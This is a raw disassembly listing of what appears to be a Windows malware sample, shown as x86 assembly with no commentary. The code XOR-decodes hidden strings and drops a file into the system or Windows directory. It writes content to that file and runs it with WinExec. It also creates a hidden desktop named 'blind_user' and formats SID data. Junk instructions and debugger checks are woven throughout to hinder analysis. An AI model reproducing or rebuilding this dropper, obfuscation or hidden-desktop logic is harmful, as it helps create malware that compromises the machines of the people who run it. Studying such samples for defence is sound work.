call sub_40C230 ; GetVersionExA
call sub_40C194 ; GetCurrentThreadId
mov eax, dword_441227
mov [ebp+var_149C+1], eax
cmp [ebp+var_1380], 2
jnz loc_4043BF
lea edi, [ebp+var_14A5]
lea esi, byte_44122B
mov ecx, 3
rep movsb
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C200 ; GetSystemDirectoryA
mov [ebp+var_14A2], 214Fh
movzx eax, [ebp+var_14A2]
imul eax, 7280h
mov [ebp+var_14A2], ax
push 0Fh
push offset aCQA ; "–ÀïËÀßÕ×ßÝÇÑÒÇ"
call sub_404201
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_11FD]
push edi
call sub_40C6B0
push 0Ah
push offset aCQA_0 ; "–ÀïÐÞ×ÃÚÕ"
call sub_404201
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1494]
push edi
call sub_40C6B0
push 8
push offset aQA ; "ïÐÞ×ÖËÖ"
call sub_404201
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C6D4
add esp, 38h
jmp loc_404462
; ---------------------------------------------------------------------------
loc_4043BF: ; CODE XREF: sub_4042A4+73�j
mov byte ptr [ebp+var_14A2+1], 0CCh
add byte ptr [ebp+var_14A2+1], 84h
push 0FFh
lea eax, [ebp+var_FF]
push eax
call sub_40C248 ; GetWindowsDirectoryA
mov [ebp+var_14A4], 283Eh
inc [ebp+var_14A4]
push 0Fh
push offset aCQKA ; "–ÀïËÀßÕ×ߊËÑÒÇ"
call sub_404201
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_11FD]
push edi
call sub_40C6B0
call sub_40C194 ; GetCurrentThreadId
push 0Eh
push offset aCQA_1 ; "–ÀïÐÜÞÞÒÝ×ÃÚÕ"
call sub_404201
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_1494]
push edi
call sub_40C6B0
mov [ebp+var_14A5], 0D8h
sub [ebp+var_14A5], 0E2h
push 0Ch
push offset aQA_0 ; "ïÐÜÞÞÒÝ×ÐÜÞ"
call sub_404201
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40C6D4
add esp, 38h
call sub_40C2B4 ; IsDebuggerPresent
loc_404462: ; CODE XREF: sub_4042A4+116�j
lea eax, [ebp+var_1494]
push eax
call sub_40C3E0 ; DeleteFileA
mov ebx, 27EBh
mov eax, ebx
add eax, ebx
mov ebx, eax
lea edi, [ebp+var_149C]
lea esi, word_44122E
xor ecx, ecx
inc ecx
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_11FD]
push eax
call sub_40C2FC ; CreateFileA
mov [ebp+var_1394], eax
push 39h
push offset dword_446398
call sub_404201
lea edi, [ebp+var_11FD]
push edi
lea edi, [ebp+var_12FC]
push edi
lea edi, [ebp+var_12FC]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40C6B0
add esp, 1Ch
call sub_40C1B8 ; RtlGetLastWin32Error
lea ecx, [ebp+var_10FE]
or eax, 0FFFFFFFFh
loc_4044ED: ; CODE XREF: sub_4042A4+24E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4044ED
push 0
lea esi, [ebp+var_14A0]
push esi
push eax
lea edi, [ebp+var_10FE]
push edi
push [ebp+var_1394]
call sub_40C3B0 ; WriteFile
call sub_40C188 ; GetCurrentProcessId
push [ebp+var_1394]
call sub_40C1DC ; CloseHandle
mov [ebp+var_1395], 0E5h
add [ebp+var_1395], 1
push 8
push offset byte_44638F
call sub_404201
add esp, 8
lea edi, [ebp+var_11FD]
push edi
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40C6B0
add esp, 10h
call sub_40C218 ; GetTickCount
push 0
lea eax, [ebp+var_10FE]
push eax
call sub_40C3A4 ; WinExec
mov ebx, 1EEBh
sub ebx, 446Ch
pop edi
pop esi
pop ebx
sub_4042A4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40457C proc near ; DATA XREF: sub_43E741+E0�o
leave
retn
sub_40457C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_441238
lea eax, ds:42FD10h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_4045BE
; ---------------------------------------------------------------------------
loc_4045A4: ; CODE XREF: .text:004045C0�j
mov eax, dword_441238
add eax, edi
lea eax, ds:42FD10h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D2h
mov [eax], dl
inc edi
loc_4045BE: ; CODE XREF: .text:004045A2�j
cmp edi, esi
jl short loc_4045A4
mov dword ptr [ebp-4], 367h
mov eax, dword_441238
add eax, esi
mov byte ptr ds:dword_42FD10[eax], 0
xor edi, edi
mov edi, dword_441238
mov eax, edi
inc eax
add eax, esi
mov dword_441238, eax
cmp eax, 0DB2h
; =============== S U B R O U T I N E =======================================
sub_4045EF proc near ; DATA XREF: sub_43E741+4B8�o
jle short loc_4045F8
and dword_441238, 0
loc_4045F8: ; CODE XREF: sub_4045EF�j
lea eax, dword_42FD10[edi]
pop edi
pop esi
leave
retn
sub_4045EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404602 proc near ; CODE XREF: sub_4063A9+1CE�p
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = word ptr -0Ch
var_9 = byte ptr -9
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_1], 0DBh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
cmp dword_44123C, 0
jz short loc_404663
call sub_40C1F4 ; GetProcessHeap
call sub_40C194 ; GetCurrentThreadId
push eax
call sub_40C4B8 ; GetThreadDesktop
mov [ebp+var_14], eax
mov [ebp+var_C], 0C1h
movzx eax, [ebp+var_C]
imul eax, 4D9Fh
mov [ebp+var_C], ax
mov eax, dword_44123C
cmp [ebp+var_14], eax
jnz short loc_40469F
mov [ebp+var_D], 96h
add [ebp+var_D], 0EBh
xor eax, eax
inc eax
jmp short loc_4046B8
; ---------------------------------------------------------------------------
loc_404663: ; CODE XREF: sub_404602+21�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
call sub_40C4A0 ; CreateDesktopA
mov dword_44123C, eax
lea edi, [ebp+var_9]
lea esi, dword_441240
xor ecx, ecx
inc ecx
rep movsb
cmp dword_44123C, 0
jnz short loc_40469A
xor eax, eax
jmp short loc_4046B8
; ---------------------------------------------------------------------------
loc_40469A: ; CODE XREF: sub_404602+92�j
call sub_40C2B4 ; IsDebuggerPresent
loc_40469F: ; CODE XREF: sub_404602+52�j
push dword_44123C
call sub_40C4AC ; SetThreadDesktop
mov [ebp+var_8], eax
mov ebx, 578Dh
sub ebx, 2A5Ah
loc_4046B8: ; CODE XREF: sub_404602+5F�j
; sub_404602+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_404602 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BD proc near ; CODE XREF: sub_4063A9+241�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_40C194 ; GetCurrentThreadId
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
call sub_40C188 ; GetCurrentProcessId
pop ebp
retn
sub_4046BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046D8 proc near ; CODE XREF: sub_40479E+49�p
; sub_40479E+7F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_44124C
lea eax, ds:416300h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_404719
sub_4046D8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40470D
loc_4046FF: ; CODE XREF: sub_40470D+E�j
mov eax, dword_44124C
add eax, edi
lea eax, ds:416300h[eax]
; END OF FUNCTION CHUNK FOR sub_40470D
; =============== S U B R O U T I N E =======================================
sub_40470D proc near ; DATA XREF: sub_43E741+600�o
; FUNCTION CHUNK AT 004046FF SIZE 0000000E BYTES
movsx edx, byte ptr [eax]
xor edx, 0ACh
mov [eax], dl
inc edi
loc_404719: ; CODE XREF: sub_4046D8+25�j
cmp edi, esi
jl short loc_4046FF
mov dword ptr [ebp-4], 12Ch
mov eax, dword_44124C
add eax, esi
mov byte ptr ds:dword_416300[eax], 0
xor edi, edi
mov edi, dword_44124C
add dword_44124C, 2
mov eax, dword_44124C
add eax, 6
add eax, esi
mov dword_44124C, eax
cmp eax, 0E01h
jle short loc_40475F
and dword_44124C, 0
loc_40475F: ; CODE XREF: sub_40470D+49�j
mov dword ptr [ebp-8], 2EEh
lea eax, dword_416300[edi]
pop edi
pop esi
leave
retn
sub_40470D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404770 proc near ; CODE XREF: sub_4056EE+6EF�p
; sub_4056EE+79F�p ...
var_107 = byte ptr -107h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C188 ; GetCurrentProcessId
push [ebp+arg_4]
push ebx
call sub_40C6D4
add esp, 8
lea edi, [ebp+var_107]
lea esi, aAKS ; "A k &s"
movsd
movsd
sub_404770 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40479E proc near ; DATA XREF: sub_43E741+502�o
lea edi, [ebp-10Dh]
lea esi, aMusr ; " musR"
mov ecx, 3
rep movsw
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404896
lea edi, [ebp-10Fh]
lea esi, byte_44125E
xor ecx, ecx
inc ecx
rep movsb
mov byte ptr [ebp-0FFh], 0
push 3
push offset aGjm ; "ƒ†Œ"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
call sub_40C194 ; GetCurrentThreadId
mov byte ptr [ebp-10Eh], 0
jmp short loc_40485F
; ---------------------------------------------------------------------------
loc_404804: ; CODE XREF: sub_40479E+C9�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404858
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-114h], eax
call sub_40C698
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-114h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
add esp, 18h
loc_404858: ; CODE XREF: sub_40479E+76�j
add byte ptr [ebp-10Eh], 1
loc_40485F: ; CODE XREF: sub_40479E+64�j
mov al, [ebp-10Eh]
cmp al, 0Ah
jb short loc_404804
call sub_40C194 ; GetCurrentThreadId
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C6D4
call sub_40C188 ; GetCurrentProcessId
push 3
push offset aMjg ; "Œ†ƒ"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 18h
loc_404896: ; CODE XREF: sub_40479E+24�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404982
mov byte ptr [ebp-111h], 58h
add byte ptr [ebp-111h], 1
push 10h
push offset aMiIIMsmiC ; "ÚÍÞŒ‰Ï‰Ï‰ÏŒ‘Œ‰Ù—"
call sub_4046D8
mov [ebp-118h], eax
call sub_40C698
mov [ebp-11Ch], eax
call sub_40C698
mov [ebp-120h], eax
call sub_40C698
mov [ebp-124h], eax
call sub_40C698
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp-124h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-120h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-11Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx ; DATA XREF: sub_43E741+41D�r
add edi, 61h
push edi
mov edi, [ebp-118h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
call sub_40C218 ; GetTickCount
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C6D4
add esp, 28h
mov word ptr [ebp-110h], 5C59h
movzx eax, word ptr [ebp-110h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-110h], ax
loc_404982: ; CODE XREF: sub_40479E+108�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404A3E
lea edi, [ebp-10Eh]
lea esi, byte_44125F
xor ecx, ecx
inc ecx
rep movsb
push 0Ah
push offset aGgiIIBj ; "ƒƒ‰Ï‰Ï‰Ï¡¦"
call sub_4046D8
mov [ebp-118h], eax
call sub_40C698
mov [ebp-11Ch], eax
call sub_40C698
mov [ebp-120h], eax
call sub_40C698
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-120h]
mov eax, edi
mov ecx, 1Ah ; DATA XREF: sub_43E741+2A�o
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-11Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-118h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
mov eax, dword_441260
mov [ebp-112h], eax
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C6D4 ; DATA XREF: sub_43F142+12�o
add esp, 24h
loc_404A3E: ; CODE XREF: sub_40479E+1F4�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404A66
push 2
push offset aBj ; "¡¦"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404A66: ; CODE XREF: sub_40479E+2B0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40479E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A6B proc near ; CODE XREF: sub_4056EE+1A5�p
; sub_4056EE+1C8�p ...
var_115 = byte ptr -115h
var_10D = byte ptr -10Dh
var_107 = byte ptr -107h
var_104 = word ptr -104h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_104], 7A29h
add [ebp+var_104], 764h
push [ebp+arg_4]
push ebx
call sub_40C6D4
add esp, 8
lea edi, [ebp+var_107]
lea esi, byte_441264
xor ecx, ecx
inc ecx
rep movsb
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404C50
lea edi, [ebp+var_115]
lea esi, aHSl?2 ; "h&sL?2*"
movsd
movsd
mov [ebp+var_FF], 0
push 5
push offset aRnbbm ; "Œ"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
mov [ebp+var_10D], 0
jmp loc_404C1A
sub_404A6B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404BA0
loc_404AF6: ; CODE XREF: sub_404BA0+82�j
call sub_40C1B8 ; RtlGetLastWin32Error
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404B4F
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-11Ch], eax
call sub_40C698
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-11Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
add esp, 18h
loc_404B4F: ; CODE XREF: sub_404BA0-95�j
call sub_40C194 ; GetCurrentThreadId
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404BA8
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-120h], eax
call sub_40C698
mov ecx, 1Ah
cdq
idiv ecx
; END OF FUNCTION CHUNK FOR sub_404BA0
; =============== S U B R O U T I N E =======================================
sub_404B85 proc near ; DATA XREF: .data:0043F39E�o
; .data:0043F3C5�o ...
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-120h]
push edi
lea edi, [ebp-0FFh]
push edi
sub_404B85 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404BA0 proc near ; DATA XREF: sub_43F142+143�o
; FUNCTION CHUNK AT 00404AF6 SIZE 0000008F BYTES
call sub_40C6B0
add esp, 18h
loc_404BA8: ; CODE XREF: sub_404BA0-3C�j
mov word ptr [ebp-118h], 2BA1h
sub word ptr [ebp-118h], 3212h
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_404C0E
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-124h], eax
call sub_40C698
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-124h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
add esp, 18h
loc_404C0E: ; CODE XREF: sub_404BA0+2A�j
call sub_40C188 ; GetCurrentProcessId
add byte ptr [ebp-10Dh], 1
loc_404C1A: ; CODE XREF: sub_404A6B+86�j
mov al, [ebp-10Dh]
cmp al, 0Ah
jb loc_404AF6
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C6D4
push 4
push offset aBbtm ; "’Œ"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 18h
call sub_40C2B4 ; IsDebuggerPresent
loc_404C50: ; CODE XREF: sub_404A6B+4E�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404DCA
call sub_40C218 ; GetTickCount
mov byte ptr [ebp-0FFh], 0
call sub_40C1F4 ; GetProcessHeap
mov byte ptr [ebp-10Dh], 0
jmp loc_404D9F
sub_404BA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404D49
loc_404C83: ; CODE XREF: sub_404D49+5E�j
mov dword ptr [ebp-114h], 59DAh
add dword ptr [ebp-114h], 6509h
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404CEB
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-118h], eax
call sub_40C698
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-118h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
add esp, 18h
loc_404CEB: ; CODE XREF: sub_404D49-A2�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404D3F
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-11Ch], eax
call sub_40C698
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-11Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
; END OF FUNCTION CHUNK FOR sub_404D49
; =============== S U B R O U T I N E =======================================
sub_404D3C proc near ; DATA XREF: .data:0043EF84�o
add esp, 18h
loc_404D3F: ; CODE XREF: sub_404D49-4E�j
call sub_40C2B4 ; IsDebuggerPresent
call sub_40C698
sub_404D3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D49 proc near ; DATA XREF: .data:0043EF2A�o
; FUNCTION CHUNK AT 00404C83 SIZE 000000B9 BYTES
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404D98
push 4
push offset aII ; "‰ß‰Ï"
call sub_4046D8
mov [ebp-120h], eax
call sub_40C698
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-120h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C6B0
add esp, 18h
loc_404D98: ; CODE XREF: sub_404D49+B�j
add byte ptr [ebp-10Dh], 1
loc_404D9F: ; CODE XREF: sub_404BA0+DE�j
mov al, [ebp-10Dh]
cmp al, 32h
jb loc_404C83
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C6D4
add esp, 8
mov ax, word_44126D
mov [ebp-10Fh], ax
loc_404DCA: ; CODE XREF: sub_404BA0+C0�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404DF2
push 4
push offset aRT ; "ÎÞ’"
sub_404D49 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DE3 proc near ; DATA XREF: sub_43E2F0+6�o
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404DF2: ; CODE XREF: sub_404D49+91�j
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E1A
push 3
push offset aRT_4 ; "Î’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404E1A: ; CODE XREF: sub_404DE3+1F�j
call sub_40C194 ; GetCurrentThreadId
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E47
push 3
push offset aRT_3 ; "Ù’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404E47: ; CODE XREF: sub_404DE3+4C�j
mov word ptr [ebp-102h], 642Bh
movzx eax, word ptr [ebp-102h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-102h], ax
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E8C
push 3
push offset aRT_1 ; "Å’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404E8C: ; CODE XREF: sub_404DE3+91�j
call sub_40C1B8 ; RtlGetLastWin32Error
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EB9
push 4
push offset aRgT ; "ƒÅ’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404EB9: ; CODE XREF: sub_404DE3+BE�j
lea edi, [ebp-10Ch]
lea esi, aUwV ; "uW V"
mov ecx, 5
rep movsb
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EF4
push 4
push offset aRgT_0 ; "ƒÎ’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404EF4: ; CODE XREF: sub_404DE3+F9�j
call sub_40C1B8 ; RtlGetLastWin32Error
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F21
push 4
push offset aRgT_1 ; "ƒÙ’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404F21: ; CODE XREF: sub_404DE3+126�j
call sub_40C218 ; GetTickCount
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F4E
push 7
push offset aRgT_2 ; "ƒÊÃÂØ’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404F4E: ; CODE XREF: sub_404DE3+153�j
mov word ptr [ebp-106h], 3E5Ch
sub word ptr [ebp-106h], 60FEh
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F88
push 8
push offset aRT_0 ; "ÏÉÂØÉÞ’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404F88: ; CODE XREF: sub_404DE3+18D�j
call sub_40C218 ; GetTickCount
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404FB5
push 9
push offset aRgT_3 ; "ƒÏÉÂØÉÞ’"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404FB5: ; CODE XREF: sub_404DE3+1BA�j
call sub_40C2B4 ; IsDebuggerPresent
call sub_40C698
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404FE2
push 2
push offset aBj ; "¡¦"
call sub_4046D8
push eax
push ebx
call sub_40C6D4
add esp, 10h
loc_404FE2: ; CODE XREF: sub_404DE3+1E7�j
pop edi
pop esi
pop ebx
leave
retn
sub_404DE3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_40507F+5A�p
; sub_40507F+8F�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_44127C
lea eax, ds:435150h[eax]
push eax
call sub_40C674
add esp, 0Ch
xor edi, edi
jmp short loc_405028
; ---------------------------------------------------------------------------
loc_40500E: ; CODE XREF: sub_404FE7+43�j
mov eax, dword_44127C
add eax, edi
lea eax, ds:435150h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ACh
mov [eax], dl
inc edi
loc_405028: ; CODE XREF: sub_404FE7+25�j
cmp edi, esi
jl short loc_40500E
mov [ebp+var_4], 12Ch
mov eax, dword_44127C
add eax, esi
mov byte ptr ds:dword_435150[eax], 0
xor edi, edi
mov edi, dword_44127C
add dword_44127C, 2
mov eax, dword_44127C
add eax, 6
add eax, esi
mov dword_44127C, eax
cmp eax, 0E01h
jle short loc_40506E
and dword_44127C, 0
loc_40506E: ; CODE XREF: sub_404FE7+7E�j
mov [ebp+var_8], 2EEh
lea eax, dword_435150[edi]
pop edi
pop esi
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40507F proc near ; CODE XREF: sub_405217+80�p
var_2C = dword ptr -2Ch
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
call sub_40C188 ; GetCurrentProcessId
lea edi, [ebp+var_1C]
lea esi, aAKS_0 ; "A k &s"
movsd
movsd
xor ebx, ebx
inc ebx
push [ebp+arg_0]
call sub_40C5FC ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
mov eax, dword_441288
mov [ebp+var_20], eax
push [ebp+arg_0]
call sub_40C614 ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_24], eax
add eax, 1Ch
mov [ebp+var_C], eax
call sub_40C218 ; GetTickCount
push 6
push offset byte_44630B
call sub_404FE7
push ebx
push eax
push [ebp+arg_4]
call sub_40C4E8 ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_405102
cmp byte ptr [eax+1], 0
jz short loc_405160
loc_405102: ; CODE XREF: sub_40507F+7B�j
call sub_40C2B4 ; IsDebuggerPresent
push 20h
push offset aIUIUIUIUIUIU ; "œÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ‰œžÄÔ"
call sub_404FE7
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax
push [ebp+var_8]
call sub_40C4E8 ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_4051BC
; ---------------------------------------------------------------------------
loc_405160: ; CODE XREF: sub_40507F+81�j
mov [ebp+var_26], 5E65h
movzx eax, [ebp+var_26]
imul eax, 686Ah
mov [ebp+var_26], ax
push 3
push offset aI_2 ; "‰ÀÙ"
call sub_404FE7
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax
push [ebp+var_8]
call sub_40C4E8 ; wsprintfA
add esp, 14h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_4051BC: ; CODE XREF: sub_40507F+DF�j
and [ebp+var_4], 0
jmp short loc_40520A
; ---------------------------------------------------------------------------
loc_4051C2: ; CODE XREF: sub_40507F+191�j
mov byte ptr [ebp+var_26+1], 58h
add byte ptr [ebp+var_26+1], 1
push 4
push offset aBi ; "‰ÀÙ"
call sub_404FE7
mov [ebp+var_2C], eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40C608 ; GetSidSubAuthority
